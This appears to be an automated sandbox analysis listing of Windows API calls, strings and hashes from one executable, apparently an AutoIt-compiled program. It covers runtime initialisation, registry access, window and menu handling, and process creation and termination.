                                                                                                                    • __init_pointers.LIBCMT ref: 002D9AE6
                                                                                                                      • Part of subcall function 002D3187: EncodePointer.KERNEL32(00000000), ref: 002D318A
                                                                                                                      • Part of subcall function 002D3187: __initp_misc_winsig.LIBCMT ref: 002D31A5
                                                                                                                      • Part of subcall function 002D3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 002D9EA0
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 002D9EB4
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 002D9EC7
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 002D9EDA
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 002D9EED
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 002D9F00
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 002D9F13
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 002D9F26
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 002D9F39
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 002D9F4C
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 002D9F5F
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 002D9F72
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 002D9F85
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 002D9F98
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 002D9FAB
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 002D9FBE
                                                                                                                    • __mtinitlocks.LIBCMT ref: 002D9AEB
                                                                                                                    • __mtterm.LIBCMT ref: 002D9AF4
                                                                                                                      • Part of subcall function 002D9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,002D9AF9,002D7CD0,0036A0B8,00000014), ref: 002D9C56
                                                                                                                      • Part of subcall function 002D9B5C: _free.LIBCMT ref: 002D9C5D
                                                                                                                      • Part of subcall function 002D9B5C: DeleteCriticalSection.KERNEL32(027,?,?,002D9AF9,002D7CD0,0036A0B8,00000014), ref: 002D9C7F
                                                                                                                    • __calloc_crt.LIBCMT ref: 002D9B19
                                                                                                                    • __initptd.LIBCMT ref: 002D9B3B
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 002D9B42
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3567560977-0
                                                                                                                    • Opcode ID: b3efb6c6a754f0b3523926d1cf7f7538931113fe92d9d06473bce5030a02c914
                                                                                                                    • Instruction ID: 5c869b9ecc5ba582dd1272276fa7f3487ff5a095b3adee59b2946c37d1eb77c2
                                                                                                                    • Opcode Fuzzy Hash: b3efb6c6a754f0b3523926d1cf7f7538931113fe92d9d06473bce5030a02c914
                                                                                                                    • Instruction Fuzzy Hash: B3F090335397126AE774BB74BC0365A26959F03B34F214A1BF464C53D2FF608CE149A0
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 0033B644
                                                                                                                    • _memset.LIBCMT ref: 0033B653
                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00376F20,00376F64), ref: 0033B682
                                                                                                                    • CloseHandle.KERNEL32 ref: 0033B694
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$CloseCreateHandleProcess
                                                                                                                    • String ID: o7$do7
                                                                                                                    • API String ID: 3277943733-2183443977
                                                                                                                    • Opcode ID: 280c0ff112e93931a3df1478bea000a971d8b215022cc7de9334254071558e20
                                                                                                                    • Instruction ID: 629ed43e86449a46429ba9d8ea6ccf80e829e3f3ea77c67715455a99180cc479
                                                                                                                    • Opcode Fuzzy Hash: 280c0ff112e93931a3df1478bea000a971d8b215022cc7de9334254071558e20
                                                                                                                    • Instruction Fuzzy Hash: C3F05EB6540700BFE2223B61BC57FBB7A9CEB08395F004021FA0DE6192D7754C148BA8
                                                                                                                    APIs
                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,002D3F85), ref: 002D4085
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 002D408C
                                                                                                                    • EncodePointer.KERNEL32(00000000), ref: 002D4097
                                                                                                                    • DecodePointer.KERNEL32(002D3F85), ref: 002D40B2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                    • String ID: RoUninitialize$combase.dll
                                                                                                                    • API String ID: 3489934621-2819208100
                                                                                                                    • Opcode ID: 06f95632a42297f74dc345a78bd191c83987c73c3c3b00bfacc4d7738c79404a
                                                                                                                    • Instruction ID: b8e751ad6a6f29f4756ea4009de3898bc3d1fad8c4acac5c1b0362915006b696
                                                                                                                    • Opcode Fuzzy Hash: 06f95632a42297f74dc345a78bd191c83987c73c3c3b00bfacc4d7738c79404a
                                                                                                                    • Instruction Fuzzy Hash: 4AE09274A96201EFEB22BF61EC49B463BACB704743F904426F115E61A0CBB65644AA15
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$__itow__swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3253778849-0
                                                                                                                    • Opcode ID: 21c363d6d5c09a7a42dfc03ef52fd438f6cd54c5821b196d12bfcbf1ca2abfab
                                                                                                                    • Instruction ID: 42bf5323aabcbaf14dd3a42fd060b6ad0f9144fd20e0f75a2065286fafadc58b
                                                                                                                    • Opcode Fuzzy Hash: 21c363d6d5c09a7a42dfc03ef52fd438f6cd54c5821b196d12bfcbf1ca2abfab
                                                                                                                    • Instruction Fuzzy Hash: 0461AD3051425A9BCF06EFA0CC82EFE37A9AF49348F048519F9555B2A2DB34EDA5CF50
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                      • Part of subcall function 00330E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0032FDAD,?,?), ref: 00330E31
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003302BD
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003302FD
                                                                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00330320
                                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00330349
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0033038C
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00330399
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4046560759-0
                                                                                                                    • Opcode ID: 3b88a52410c8cef8c7a42e649534d79a2cf8cdde0c5768c8ed665d4208f34d6e
                                                                                                                    • Instruction ID: 2ef4be0ebf7db42fdba47af0efe322f87e01fdc314c2eeae102a756440e0b9b3
                                                                                                                    • Opcode Fuzzy Hash: 3b88a52410c8cef8c7a42e649534d79a2cf8cdde0c5768c8ed665d4208f34d6e
                                                                                                                    • Instruction Fuzzy Hash: AD515C31218200AFC709EF64C895EAFBBE9FF89314F44491DF5958B2A2DB31E915CB52
                                                                                                                    APIs
                                                                                                                    • GetMenu.USER32(?), ref: 003357FB
                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 00335832
                                                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0033585A
                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 003358C9
                                                                                                                    • GetSubMenu.USER32(?,?), ref: 003358D7
                                                                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00335928
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Item$CountMessagePostString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 650687236-0
                                                                                                                    • Opcode ID: 0017e12e3e7b553560db0ceba51c324af6573fade2c9fdbabb835d0ef2b5b7ae
                                                                                                                    • Instruction ID: e4f38b3d1ad419824cebb8534cf5916cea7a4ea32cce27a154d41f93747b5343
                                                                                                                    • Opcode Fuzzy Hash: 0017e12e3e7b553560db0ceba51c324af6573fade2c9fdbabb835d0ef2b5b7ae
                                                                                                                    • Instruction Fuzzy Hash: B7516D31E00615EFCF12DF64C885AAEB7B5EF48320F114069E841BB361CB70AE41CB90
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0030EF06
                                                                                                                    • VariantClear.OLEAUT32(00000013), ref: 0030EF78
                                                                                                                    • VariantClear.OLEAUT32(00000000), ref: 0030EFD3
                                                                                                                    • _memmove.LIBCMT ref: 0030EFFD
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0030F04A
                                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0030F078
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1101466143-0
                                                                                                                    • Opcode ID: 599075e71fbabc4bb062b3c8eba78646d8ea9e8182bf43f64803798d9966d9ab
                                                                                                                    • Instruction ID: bf15a8c7717157c0781931cc50e65e0d72c064a8e2a46e5da2e81008c534615b
                                                                                                                    • Opcode Fuzzy Hash: 599075e71fbabc4bb062b3c8eba78646d8ea9e8182bf43f64803798d9966d9ab
                                                                                                                    • Instruction Fuzzy Hash: 16516AB5A00209EFCB25CF58C890AAAB7B8FF4C314F158569E959DB341E735E911CFA0
APIs
• _memset.LIBCMT ref: 00312258
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003122A3
• IsMenu.USER32(00000000), ref: 003122C3
• CreatePopupMenu.USER32 ref: 003122F7
• GetMenuItemCount.USER32(000000FF), ref: 00312355
• InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00312386
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup_memset
• String ID:
• API String ID: 3311875123-0
APIs
  • Part of subcall function 002B2612: GetWindowLongW.USER32(?,000000EB), ref: 002B2623
• BeginPaint.USER32(?,?,?,?,?,?), ref: 002B179A
• GetWindowRect.USER32(?,?), ref: 002B17FE
• ScreenToClient.USER32(?,?), ref: 002B181B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 002B182C
• EndPaint.USER32(?,?), ref: 002B1876
Similarity
• API ID: PaintWindow$BeginClientLongRectScreenViewport
• String ID:
• API String ID: 1827037458-0
APIs
• ShowWindow.USER32(003757B0,00000000,00F75548,?,?,003757B0,?,0033B5A8,?,?), ref: 0033B712
• EnableWindow.USER32(00000000,00000000), ref: 0033B736
• ShowWindow.USER32(003757B0,00000000,00F75548,?,?,003757B0,?,0033B5A8,?,?), ref: 0033B796
• ShowWindow.USER32(00000000,00000004,?,0033B5A8,?,?), ref: 0033B7A8
• EnableWindow.USER32(00000000,00000001), ref: 0033B7CC
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 0033B7EF
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,00324E41,?,?,00000000,00000001), ref: 003270AC
  • Part of subcall function 003239A0: GetWindowRect.USER32(?,?), ref: 003239B3
• GetDesktopWindow.USER32 ref: 003270D6
• GetWindowRect.USER32(00000000), ref: 003270DD
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0032710F
  • Part of subcall function 00315244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003152BC
• GetCursorPos.USER32(?), ref: 0032713B
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00327199
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• String ID:
• API String ID: 4137160315-0
APIs
  • Part of subcall function 003080A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003080C0
  • Part of subcall function 003080A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003080CA
  • Part of subcall function 003080A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003080D9
  • Part of subcall function 003080A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003080E0
  • Part of subcall function 003080A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003080F6
• GetLengthSid.ADVAPI32(?,00000000,0030842F), ref: 003088CA
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 003088D6
• HeapAlloc.KERNEL32(00000000), ref: 003088DD
• CopySid.ADVAPI32(00000000,00000000,?), ref: 003088F6
• GetProcessHeap.KERNEL32(00000000,00000000,0030842F), ref: 0030890A
• HeapFree.KERNEL32(00000000), ref: 00308911
Similarity
• API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
• String ID:
• API String ID: 3008561057-0
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003085E2
• OpenProcessToken.ADVAPI32(00000000), ref: 003085E9
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003085F8
• CloseHandle.KERNEL32(00000004), ref: 00308603
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00308632
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00308646
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
APIs
• GetDC.USER32(00000000), ref: 0030B7B5
• GetDeviceCaps.GDI32(00000000,00000058), ref: 0030B7C6
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0030B7CD
• ReleaseDC.USER32(00000000,00000000), ref: 0030B7D5
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 0030B7EC
• MulDiv.KERNEL32(000009EC,?,?), ref: 0030B7FE
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 002D0193
• MapVirtualKeyW.USER32(00000010,00000000), ref: 002D019B
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 002D01A6
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 002D01B1
• MapVirtualKeyW.USER32(00000011,00000000), ref: 002D01B9
• MapVirtualKeyW.USER32(00000012,00000000), ref: 002D01C1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Virtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4278518827-0
                                                                                                                    • Opcode ID: 71ede40d3df374af9632c971876e33cea99e41ef687498bcae6d8ec68f9f67b3
                                                                                                                    • Instruction ID: a6315eb8864654b35de577ebfd4ce20ca1448c971b63b7f90a6177bc75d01760
                                                                                                                    • Opcode Fuzzy Hash: 71ede40d3df374af9632c971876e33cea99e41ef687498bcae6d8ec68f9f67b3
                                                                                                                    • Instruction Fuzzy Hash: 8A0148B09017597DE3008F5A8C85A52FEA8FF19354F00411BA15847941C7B5A864CBE5
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003153F9
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0031540F
• GetWindowThreadProcessId.USER32(?,?), ref: 0031541E
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0031542D
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00315437
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0031543E
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 00317243
• EnterCriticalSection.KERNEL32(?,?,002C0EE4,?,?), ref: 00317254
• TerminateThread.KERNEL32(00000000,000001F6,?,002C0EE4,?,?), ref: 00317261
• WaitForSingleObject.KERNEL32(00000000,000003E8,?,002C0EE4,?,?), ref: 0031726E
  • Part of subcall function 00316C35: CloseHandle.KERNEL32(00000000,?,0031727B,?,002C0EE4,?,?), ref: 00316C3F
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00317281
• LeaveCriticalSection.KERNEL32(?,?,002C0EE4,?,?), ref: 00317288
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 0030899D
• UnloadUserProfile.USERENV(?,?), ref: 003089A9
• CloseHandle.KERNEL32(?), ref: 003089B2
• CloseHandle.KERNEL32(?), ref: 003089BA
• GetProcessHeap.KERNEL32(00000000,?), ref: 003089C3
• HeapFree.KERNEL32(00000000), ref: 003089CA
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00342C7C,?), ref: 003076EA
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00342C7C,?), ref: 00307702
• CLSIDFromProgID.OLE32(?,?,00000000,0033FB80,000000FF,?,00000000,00000800,00000000,?,00342C7C,?), ref: 00307727
• _memcmp.LIBCMT ref: 00307748
Strings
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID: ,,4
• API String ID: 314563124-3600021901
APIs
• VariantInit.OLEAUT32(?), ref: 00328613
• CharUpperBuffW.USER32(?,?), ref: 00328722
• VariantClear.OLEAUT32(?), ref: 0032889A
  • Part of subcall function 00317562: VariantInit.OLEAUT32(00000000), ref: 003175A2
  • Part of subcall function 00317562: VariantCopy.OLEAUT32(00000000,?), ref: 003175AB
  • Part of subcall function 00317562: VariantClear.OLEAUT32(00000000), ref: 003175B7
Strings
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4237274167-1221869570
APIs
  • Part of subcall function 002CFC86: _wcscpy.LIBCMT ref: 002CFCA9
• _memset.LIBCMT ref: 00312B87
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00312BB6
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00312C69
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00312C97
Strings
Similarity
• API ID: ItemMenu$Info$Default_memset_wcscpy
• String ID: 0
• API String ID: 4152858687-4108050209
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$_free
                                                                                                                    • String ID: 3c,$_,
                                                                                                                    • API String ID: 2620147621-370742736
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$_memmove
                                                                                                                    • String ID: 3c,$ERCP
                                                                                                                    • API String ID: 2532777613-3822882533
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 003127C0
                                                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 003127DC
                                                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00312822
                                                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00375890,00000000), ref: 0031286B
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1173514356-4108050209
                                                                                                                    APIs
                                                                                                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0032D7C5
                                                                                                                      • Part of subcall function 002B784B: _memmove.LIBCMT ref: 002B7899
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharLower_memmove
                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                    • API String ID: 3425801089-567219261
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                      • Part of subcall function 0030AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0030AABC
                                                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00308F14
                                                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00308F27
